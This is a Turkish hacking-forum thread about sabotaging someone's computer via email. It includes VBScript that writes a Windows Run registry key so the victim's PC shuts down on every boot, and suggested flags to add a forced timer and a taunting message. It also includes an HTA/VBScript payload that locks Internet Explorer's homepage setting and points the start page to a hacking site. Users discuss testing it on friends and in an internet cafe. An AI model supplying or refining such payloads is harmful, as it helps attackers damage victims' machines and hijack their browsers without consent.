Mail İle PC Çökertme

M UrA T

New member
Reaction score
0
İndirmek istediğiniz kişiye mail yollayın ve maile şu kodları ekleyin

<script language="vbscript">
on error resume next
dim kutluk
set kutluk=CreateObject("WScript.Shell")

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32"*"shutdown -r"

</script>

Kişi maili açtığı anda kodlar devreye girecek

PC Yİ YENİDEN BAŞLATMASIYLA YADA PC Yİ AÇTIĞINDA

SİSTEM UYARISI GELECEK VE TÜM UYGULAMANIZI KAPATIN DİYECEK.
YANİ PC HER AÇILDIĞINDA 24 SANİYEDE BİR KAPANACAK..

M UrA T

Dostum eğer bu kodun çalışması yazdığımız "shutdown.exe -parametreler" in kullanımı ile aynı ise biraz geliştirilebilir:
"-r" yerine
PHP:
-r -f -t 30 -c "your computer hacked by dangerous benimle uğraşmıcaktın pislik gibi bişey yazın"
30 burda kaç saniye sonra kapancağını belirtiyor. tırnak içindeki yerler zaten belli oraya bir mesaj yazıyorsunuz.
Hadi diyelim ki bu koda biz yakalandık. Bakıyorsunuz ctrl+alt+del vs. hiç bişey engelleyemiyor kapanma sist. Tabi biz boş dururmuyuz:hhcool hemen çalıştıra(windows logo tuşu+r den kısayol olarak açabilirsiniz.) şunu yazıyoruz:
PHP:
shutdown.exe -a
bakın iptal oldu:durdurun
Eğer nasıl bir mesaj olduğunu merak ediyor ve kendi makinanızda denemek istiyorsanız çalıştırdan shutdown.exe yi yukarda verdiğim parametrelerle çalıştırın.Fakat bu sefer sadece kod çalışcak ve pc yi kapatacaktır. Her açıldığınında kod çalışmaz.
ALINTI DEĞİLDİR

işe yarmıyor ama yinede sağol

sımdı calısacakmı calısmayacakmı ??

hotmail, gmail tarzı mail serverlarda işe yaramaz, belki outlook ile maile bakarsa

kurban, o da belki.. vb kodlarının çalışmasına hangi mail server izin verir ki?..

not pede yazıp msnden gonderin ziplemeyi unutmayın ozaman işe yarar belki bi arkadasa gondermiştimde pcsi hala duzelmedi diz üstü :p

ya şu işi açıkça yazarmısınız ve gercekten ıse yarıyormu

djalicee' Alıntı:
işe yarmıyor ama yinede sağol
Dostum işe yaraması lazım bence. Çünkü forumumuzda benzer bi kod vardı. O da registry değerlerini yazıyordu. Kendi pc mde denedim çalıştı. Forumdaki diğer kodla aynıysa çalışması gerekir. Diğer kodu bulamadım. Ayrıca pc nde firewall vs. varsa engelleme ihtmali var. Meselea diğer kodu çalıştırdığımda kaspersky registry guard uyarı verdi:"Bu registry değerini yazmak istiyor musunuz" diye. Diğer kodu bulabilsem emin olcaz ama arama mot. bulamadım. St.anger ın yazdığı kalıcı olarak anasayfayı değiştirme koduydu. Ama tabi mail ile çökceğini bende zannetmiyorum.
Edit:
Arkadaşlar arama motorunda gözümden kaçmış kusura bakmayın:
Diğer kod bu kodla benzemiyor:
PHP:
<html><head>
<hta:application id=hta_note_id
 applicationName=hta_note_name
 showInTaskBar=no
 caption=no
 innerBorder=no
 selection=no
 scroll=no
 contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
  shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
  shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
  shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.hackhell.net/","REG_SZ"
  shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.hackhell.net/","REG_SZ"
self.Close
</SCRIPT><script type='text/javascript' src='/pop.js'>
http://www.hackhell.com/internet-explorer-main-page-hack-st-anger-t73812.html?t=73812
Artık denemek lazım bi c@fede:) bu yenisini....

Geri